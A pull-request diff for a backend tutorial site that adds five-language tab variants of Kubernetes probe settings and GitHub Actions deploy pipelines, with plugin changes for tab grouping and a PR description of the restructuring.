+```yaml tab="TypeScript" title="probes + resources in the container spec"
+# ...inside the Deployment's containers: entry (sec 14)
+          livenessProbe:
+            httpGet: { path: /healthz, port: 8080 }
+            initialDelaySeconds: 5
+            periodSeconds: 10
+          readinessProbe:
+            httpGet: { path: /ready, port: 8080 }
+            periodSeconds: 5
+          resources:
+            requests: { cpu: "100m", memory: "256Mi" }
+            limits:   { cpu: "500m", memory: "512Mi" }
+          env:
+            - name: NODE_OPTIONS
+              value: "--max-old-space-size=384"   # ~75% of the limit
+          # Node is single-threaded per process, so a CPU limit above
+          # 1000m buys nothing for one container. Scale with replicas
+          # (sec 18) rather than with a bigger CPU ceiling.
+```
+
+```yaml tab="Java" title="probes + resources in the container spec"
+# ...inside the Deployment's containers: entry (sec 14)
+          # Spring Boot Actuator exposes purpose-built endpoints, and
+          # using them matters: /liveness must NOT fail on a database
+          # outage, or every pod restarts during an incident that a
+          # restart cannot fix (chapter 12).
+          livenessProbe:
+            httpGet: { path: /actuator/health/liveness, port: 8080 }
+            periodSeconds: 10
+          readinessProbe:
+            httpGet: { path: /actuator/health/readiness, port: 8080 }
+            periodSeconds: 5
+          # The JVM's cold start is long enough that a liveness probe
+          # can kill the pod before it ever serves. A startupProbe holds
+          # the other two off until boot finishes: 30 x 5s = 150s budget.
+          startupProbe:
+            httpGet: { path: /actuator/health/readiness, port: 8080 }
+            failureThreshold: 30
+            periodSeconds: 5
+          resources:
+            requests: { cpu: "500m", memory: "512Mi" }
+            limits:   { cpu: "2000m", memory: "1Gi" }
+          env:
+            # Java 10+ IS cgroup-aware, so the heap is sized from the
+            # container limit rather than the node. Tune the fraction
+            # rather than hard-coding -Xmx, which ignores the limit.
+            - name: JAVA_TOOL_OPTIONS
+              value: "-XX:MaxRAMPercentage=70"
 ```
 
 <Callout type="info" title="Probes pair with graceful shutdown">
@@ -651,7 +996,11 @@ Containers make the artifact reproducible; **CI/CD** makes the path from a code 
 <svg viewBox="0 0 720 150" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="A CI/CD pipeline: commit, build image, test, scan, push to registry, deploy to Kubernetes"><defs><marker id="pp" markerWidth="9" markerHeight="9" refX="7" refY="3" orient="auto"><path d="M0 0 L7 3 L0 6 Z" fill="var(--dg-accent-2)"></path></marker></defs><g font-family="var(--font-ui)"><rect x="14" y="50" width="92" height="48" rx="9" fill="var(--dg-accent)"></rect><text x="60" y="70" font-size="10.5" font-weight="700" fill="var(--dg-on-accent)" text-anchor="middle">commit</text><text x="60" y="86" class="mono" font-size="8" fill="var(--dg-on-accent)" text-anchor="middle">git push</text><rect x="126" y="50" width="92" height="48" rx="9" fill="var(--dg-surface)" stroke="var(--dg-accent)"></rect><text x="172" y="70" font-size="10.5" font-weight="700" fill="var(--dg-accent-2)" text-anchor="middle">build</text><text x="172" y="86" class="mono" font-size="8" fill="var(--dg-ink-2)" text-anchor="middle">image sec 6</text><rect x="238" y="50" width="92" height="48" rx="9" fill="var(--dg-surface)" stroke="var(--dg-accent)"></rect><text x="284" y="70" font-size="10.5" font-weight="700" fill="var(--dg-accent-2)" text-anchor="middle">test</text><text x="284" y="86" class="mono" font-size="8" fill="var(--dg-ink-2)" text-anchor="middle">unit/integ</text><rect x="350" y="50" width="92" height="48" rx="9" fill="var(--dg-surface)" stroke="var(--dg-accent)"></rect><text x="396" y="70" font-size="10.5" font-weight="700" fill="var(--dg-accent-2)" text-anchor="middle">scan</text><text x="396" y="86" class="mono" font-size="8" fill="var(--dg-ink-2)" text-anchor="middle">CVEs</text><rect x="462" y="50" width="100" height="48" rx="9" fill="var(--dg-inverse)"></rect><text x="512" y="70" font-size="10.5" font-weight="700" fill="var(--dg-on-inverse)" text-anchor="middle">push</text><text x="512" y="86" class="mono" font-size="8" fill="var(--dg-on-inverse)" text-anchor="middle">registry sec 8</text><rect x="582" y="50" width="120" height="48" rx="9" fill="var(--dg-ok)"></rect><text x="642" y="70" font-size="10.5" font-weight="700" fill="var(--dg-on-accent)" text-anchor="middle">deploy</text><text x="642" y="86" class="mono" font-size="8" fill="var(--dg-on-accent)" text-anchor="middle">rollout sec 18</text></g><path d="M106 74 H124" stroke="var(--dg-accent-2)" stroke-width="1.6" marker-end="url(#pp)"></path><path d="M218 74 H236" stroke="var(--dg-accent-2)" stroke-width="1.6" marker-end="url(#pp)"></path><path d="M330 74 H348" stroke="var(--dg-accent-2)" stroke-width="1.6" marker-end="url(#pp)"></path><path d="M442 74 H460" stroke="var(--dg-accent-2)" stroke-width="1.6" marker-end="url(#pp)"></path><path d="M562 74 H580" stroke="var(--dg-accent-2)" stroke-width="1.6" marker-end="url(#pp)"></path><text x="360" y="128" class="serif" font-size="12.5" font-style="italic" fill="var(--dg-ink-2)" text-anchor="middle">Each stage is a gate: a failed test or a critical CVE stops the pipeline before anything reaches production.</text></svg>
 </Diagram>
 
-```yaml title=".github/workflows/deploy.yaml / a representative pipeline"
+● Go● Python● JavaScript● TypeScript● Java
+
+the same six gates; only the test and build steps change
+
+```yaml tab="Go" title=".github/workflows/deploy.yaml / a representative pipeline"
 name: ci-cd
 on:
   push:
@@ -663,8 +1012,12 @@ jobs:
     steps:
       - uses: actions/checkout@v4
 
+      - uses: actions/setup-go@v5
+        with: { go-version: "1.22", cache: true }
+
       - name: Run tests              # CI gate, must pass before we ship (sec testing chapter)
-        run: make test               # go test ./...  |  pytest
+        run: go test -race ./...     # -race in CI: it costs minutes and
+                                     # catches the bugs of chapter 20
 
       - name: Build image
         run: docker build -t $REGISTRY/myapp:${{ github.sha }} .   # tag = commit SHA (sec 8)
@@ -678,6 +1031,166 @@ jobs:
           docker push $REGISTRY/myapp:${{ github.sha }}
 
       - name: Deploy to Kubernetes   # update the Deployment's image -> triggers a rolling update (sec 18)
+        run: kubectl set image deployment/api api=$REGISTRY/myapp:${{ github.sha }}
+```
+
+```yaml tab="Python" title=".github/workflows/deploy.yaml / a representative pipeline"
+name: ci-cd
+on:
+  push:
+    branches: [main]
+
+jobs:
+  build-test-deploy:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+
+      - uses: actions/setup-python@v5
+        with: { python-version: "3.11", cache: "pip" }
+
+      - name: Install dependencies
+        run: pip install -r requirements.txt -r requirements-dev.txt
+
+      - name: Run tests              # CI gate, must pass before we ship
+        run: pytest --cov=app --cov-fail-under=80
+
+      - name: Type check             # mypy is the closest Python gets to
+        run: mypy app                # the TypeScript tab's compile gate
+
+      - name: Build image
+        run: docker build -t $REGISTRY/myapp:${{ github.sha }} .
+
+      - name: Scan image for vulnerabilities
+        run: trivy image --severity HIGH,CRITICAL --exit-code 1 $REGISTRY/myapp:${{ github.sha }}
+
+      - name: Push to registry
+        run: |
+          echo "$REGISTRY_TOKEN" | docker login $REGISTRY -u ci --password-stdin
+          docker push $REGISTRY/myapp:${{ github.sha }}
+
+      - name: Deploy to Kubernetes
+        run: kubectl set image deployment/api api=$REGISTRY/myapp:${{ github.sha }}
+```
+
+```yaml tab="JavaScript" title=".github/workflows/deploy.yaml / a representative pipeline"
+name: ci-cd
+on:
+  push:
+    branches: [main]
+
+jobs:
+  build-test-deploy:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+
+      - uses: actions/setup-node@v4
+        with: { node-version: "20", cache: "npm" }
+
+      # `npm ci`, never `npm install`, in CI: it installs exactly the
+      # lockfile and FAILS on a stale one, so the pipeline tests the same
+      # dependency tree the image will ship.
+      - name: Install dependencies
+        run: npm ci
+
+      - name: Run tests              # CI gate, must pass before we ship
+        run: npm test
+
+      - name: Audit dependencies     # the supply chain is the attack
+        run: npm audit --audit-level=high  # surface here (chapter 17)
+
+      - name: Build image
+        run: docker build -t $REGISTRY/myapp:${{ github.sha }} .
+
+      - name: Scan image for vulnerabilities
+        run: trivy image --severity HIGH,CRITICAL --exit-code 1 $REGISTRY/myapp:${{ github.sha }}
+
+      - name: Push to registry
+        run: |
+          echo "$REGISTRY_TOKEN" | docker login $REGISTRY -u ci --password-stdin
+          docker push $REGISTRY/myapp:${{ github.sha }}
+
+      - name: Deploy to Kubernetes
+        run: kubectl set image deployment/api api=$REGISTRY/myapp:${{ github.sha }}
+```
+
+```yaml tab="TypeScript" title=".github/workflows/deploy.yaml / a representative pipeline"
+name: ci-cd
+on:
+  push:
+    branches: [main]
+
+jobs:
+  build-test-deploy:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+
+      - uses: actions/setup-node@v4
+        with: { node-version: "20", cache: "npm" }
+
+      - name: Install dependencies
+        run: npm ci
+
+      # The compile IS a test, and it is the cheapest one you have, so
+      # run it first and fail fast. `tsc --noEmit` type-checks without
+      # writing output; the image's builder stage does the real build.
+      - name: Type check
+        run: npx tsc --noEmit
+
+      - name: Run tests              # CI gate, must pass before we ship
+        run: npm test
+
+      - name: Build image
+        run: docker build -t $REGISTRY/myapp:${{ github.sha }} .
+
+      - name: Scan image for vulnerabilities
+        run: trivy image --severity HIGH,CRITICAL --exit-code 1 $REGISTRY/myapp:${{ github.sha }}
+
+      - name: Push to registry
+        run: |
+          echo "$REGISTRY_TOKEN" | docker login $REGISTRY -u ci --password-stdin
+          docker push $REGISTRY/myapp:${{ github.sha }}
+
+      - name: Deploy to Kubernetes
+        run: kubectl set image deployment/api api=$REGISTRY/myapp:${{ github.sha }}
+```
+
+```yaml tab="Java" title=".github/workflows/deploy.yaml / a representative pipeline"
+name: ci-cd
+on:
+  push:
+    branches: [main]
+
+jobs:
+  build-test-deploy:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+
+      - uses: actions/setup-java@v4
+        with:
+          java-version: "21"
+          distribution: temurin
+          cache: gradle           # the Gradle cache is large; cache it
+
+      - name: Run tests              # CI gate, must pass before we ship
+        run: ./gradlew test --no-daemon   # --no-daemon: the daemon only
+                                          # pays off across repeated runs
+
+      - name: Build image
+        run: docker build -t $REGISTRY/myapp:${{ github.sha }} .
+
+      - name: Scan image for vulnerabilities
+        run: trivy image --severity HIGH,CRITICAL --exit-code 1 $REGISTRY/myapp:${{ github.sha }}
+
+      - name: Push to registry
+        run: |
+          echo "$REGISTRY_TOKEN" | docker login $REGISTRY -u ci --password-stdin
+          docker push $REGISTRY/myapp:${{ github.sha }}
+
+      - name: Deploy to Kubernetes
         run: kubectl set image deployment/api api=$REGISTRY/myapp:${{ github.sha }}
 ```
 
@@ -742,4 +1255,4 @@ The whole manual compressed to what you reach for under pressure.
 
 Grounded in the Docker & Kubernetes docs / OCI image-spec / the Twelve-Factor App / Go 1.22+ / Python 3.11+ application examples.
 
-Backend from First Principles / Chapter 21 / Containers. Code targets Go 1.22+ and Python 3.11+.
+Backend from First Principles / Chapter 21 / Containers. Code targets Go 1.22+, Python 3.11+, Node.js 20+, TypeScript 5+ and Java 21+.

--- a/src/plugins/rehype-code-tabs.mjs
+++ b/src/plugins/rehype-code-tabs.mjs
@@ -209,7 +209,14 @@ function isCodeBlock(node) {
   return isAstroCode && !!node.properties?.['data-lang'];
 }
 
+// The key a block is grouped and labelled by. Normally the fence
+// language, but an explicit `tab="Go"` wins: it is what lets five blocks
+// that share a language (five Dockerfiles, say) still be alternatives.
+// The tag is written as a display name, so it is normalised back to the
+// internal key here and everything downstream stays unchanged.
 function getLang(pre) {
+  const tab = pre.properties?.['data-tab'];
+  if (typeof tab === 'string') return LANG_BY_DISPLAY_NAME.get(tab) ?? tab.toLowerCase();
   return pre.properties?.['data-lang'];
 }
 

--- a/src/plugins/shiki-code-title.mjs
+++ b/src/plugins/shiki-code-title.mjs
@@ -2,6 +2,11 @@
  * Shiki transformer: lifts ```lang title="server.go" onto the <pre> as data
  * attributes, so the stylesheet can render a filename bar without any
  * runtime JavaScript.
+ *
+ * Also lifts ```lang tab="Go", which names the tab a block should sit under
+ * when the fence language is NOT the thing that distinguishes the
+ * alternatives. Five Dockerfiles are all `dockerfile`, so without this they
+ * could never be grouped; with it, each says which language it builds for.
  */
 export const shikiCodeTitle = {
   name: 'bfp:code-title',
@@ -9,6 +14,8 @@ export const shikiCodeTitle = {
     const raw = this.options.meta?.__raw ?? '';
     const title = raw.match(/title="([^"]+)"/)?.[1];
     if (title) node.properties['data-title'] = title;
+    const tab = raw.match(/tab="([^"]+)"/)?.[1];
+    if (tab) node.properties['data-tab'] = tab;
     node.properties['data-lang'] = this.options.lang ?? '';
   },
 };


### PR DESCRIPTION
Chapters that needed restructuring
Several chapters had no tab groups at all their code was single-language sections tied to one framework, so the work was to find the concept each pair of sections shared and merge them.
- 09 Caching four X in Go / X in Python sections become four five tab blocks.
- 10 Task Queues the parallel Celery and Asynq deep dives split into four concept based sections (consumer, producer, running the worker, recurring tasks), plus idempotency, rate limiting, instrumentation and Temporal.
- 11 Full Text Search, 12 Error Handling, 14 Config, 15 Observability, 16 Graceful Shutdown, 17 Security, 18/19 Scaling same treatment, 27 new groups in total.
- 21 Docker/K8s/CI-CD: the Dockerfiles, .dockerignore, container probes and CI pipeline, the parts that genuinely differ per toolchain.

Deliberately not converted
- 20 Concurrency keeps its event loop, goroutine and thread per request sections untabbed. Those blocks exist to contrast different concurrency models, so tabbing them would hide the comparison the chapter is making. Only the two places where the code really is one idea five ways, the check then act race and mutual exclusion, became tab groups.
- Shared infrastructure stays untabbed compose.yaml, the Kubernetes manifests, and the docker/kubectl command listings would be five identical panels.

Tab grouping by label
- The grouper keys on the fence language, so five Dockerfiles, all ```dockerfile, could never be treated as alternatives. Add an optional tab="Go" fence tag that supplies the grouping key and the button label when the language is not what distinguishes the blocks. Additive: fences without the tag take the identical path, and all 60 pre-existing groups render unchanged.

Migration repairs
Chapters 11, 12, 17, 18, 19 and 20 carried damage from the HTML->MDX conversion that this work surfaced:
- A language label fused onto the first line of the code, in all 23 of chapter 17's fences ("Go / pgx parameterised query//NEVER, string concatenation"), and in chapters 11 and 12.
- A bare label line inside the fence, in 22 fences across 18 and 19.
- A label fused onto the LAST line, in chapter 20 ("print(counter) # Always 1000Python").
- Trailing language names inside fences in 10, 15 and 21, which rendered as a final line of code.
- Fences declaring the wrong language: SQL as ```dockerfile, JavaScript and shell as ```text, a Python state machine as ```go, Compose YAML as ```go, and Kubernetes manifests as ```text.
- Chapter 13's .proto workflow block had a "Go Python" label but two ```text fences, so it never formed a group and the label rendered as body text on the page.

Supporting changes
- Name all five languages in each chapter's summary, callouts and footer, and fill in the placeholder summaries for chapters 10, 11, 12, 15, 17, 18, 19 and 20.

Verified astro build clean from a cold cache, all 141 groups render in Go -> Python -> JavaScript -> TypeScript -> Java with no empty panels, npm test 13/13.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

- **Documentation**
  - Expanded chapters on backend development, APIs, databases, caching, security, observability, scaling, concurrency, deployment, and more with JavaScript, TypeScript, and Java examples alongside Go and Python.
  - Added practical coverage for frameworks, middleware, health checks, retries, queues, authentication, tracing, graceful shutdown, and performance.
  - Updated language tabs, runtime/version guidance, summaries, references, and code-block labels for clearer navigation and accuracy.

- **Improvements**
  - Enhanced code tabs to support explicit display names and consistently group alternative implementations.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->